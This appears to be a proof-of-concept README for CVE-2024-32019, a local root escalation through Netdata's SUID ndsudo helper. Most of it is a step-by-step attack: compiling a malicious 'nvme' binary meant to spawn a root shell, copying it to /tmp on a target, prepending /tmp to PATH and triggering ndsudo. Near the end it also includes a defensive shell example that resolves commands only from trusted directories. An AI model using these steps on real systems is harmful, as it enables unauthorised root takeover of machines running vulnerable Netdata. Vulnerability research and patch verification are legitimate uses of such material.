CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Associated Vulnerability
Title: ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description: Netdata is an open source observability tool. The `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
POC for netdata ndsudo vulnerability - CVE-2024-32019
Readme

# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This POC is used to exploit a vulnerable `ndsudo` utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s `PATH` that impersonates a trusted command (`nvme`) and is executed with root privileges by `ndsudo`.

---

## Prerequisites & Assumptions

- You have **local shell access** on the target system.
- You can execute the following command but it fails with a "not found" or similar error:

  ```bash
  ./ndsudo nvme-list
  ```
---

### 1. Compile the Malicious Payload

On your **attacker machine** (or the vulnerable system if it has a compiler), compile the binary (for example, from the file `poc.c` in the repository):

```bash
gcc poc.c -o nvme
```

This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.

---

### 2. Transfer the Payload to the Target System

Move or upload the compiled `nvme` binary to a directory writable by your user, such as `/tmp`:

```bash
scp nvme user@target:/tmp/
# or use any file upload method you have
```

---

### 3. Prepare the Payload for Execution

On the **target system**, make sure the binary is executable and prepend its directory to your `PATH`:

```bash
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
```

This ensures `ndsudo` will resolve and execute your malicious `nvme` instead of the legitimate one.

---

### 4. Trigger `ndsudo` to Execute Your Payload

Run the vulnerable command to trigger `ndsudo`:

```bash
./ndsudo nvme-list
```
---
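
Seen from the defender's side, the root cause in the steps above is that a privileged helper resolves a command name through the caller's `PATH`. The following added example (not code from this repository or from Netdata) contrasts that lookup with resolution against a fixed directory list; the function names and the `TRUSTED_DIRS` default are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not Netdata's code: how a privileged wrapper should locate
# a helper command. Function names and the directory list are assumptions.

# Assumed allowlist of system directories; adjust to the distribution.
TRUSTED_DIRS="${TRUSTED_DIRS:-/usr/sbin:/usr/bin:/sbin:/bin}"

# Unsafe pattern: the lookup follows whatever PATH the caller exported.
resolve_via_path() {
    command -v "$1"
}

# Hardened pattern: ignore PATH, search only fixed absolute directories,
# and skip any directory that group or others can write to.
resolve_trusted() {
    name=$1
    case $name in
        ''|*/*) return 2 ;;                 # bare command names only
    esac
    old_ifs=$IFS
    IFS=:
    for dir in $TRUSTED_DIRS; do
        IFS=$old_ifs
        case $dir in
            /*) ;;                          # absolute entries only
            *) continue ;;                  # drops "", "." and relative dirs
        esac
        # find prints the directory when it is group- or world-writable
        if [ -n "$(find "$dir" -prune \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
            continue
        fi
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1                                # not found in any trusted dir
}
```

A wrapper built this way passes the absolute path returned by `resolve_trusted` to `exec`, so a file placed in a user-writable directory is never considered, whatever `PATH` contains.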

## Resources

- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93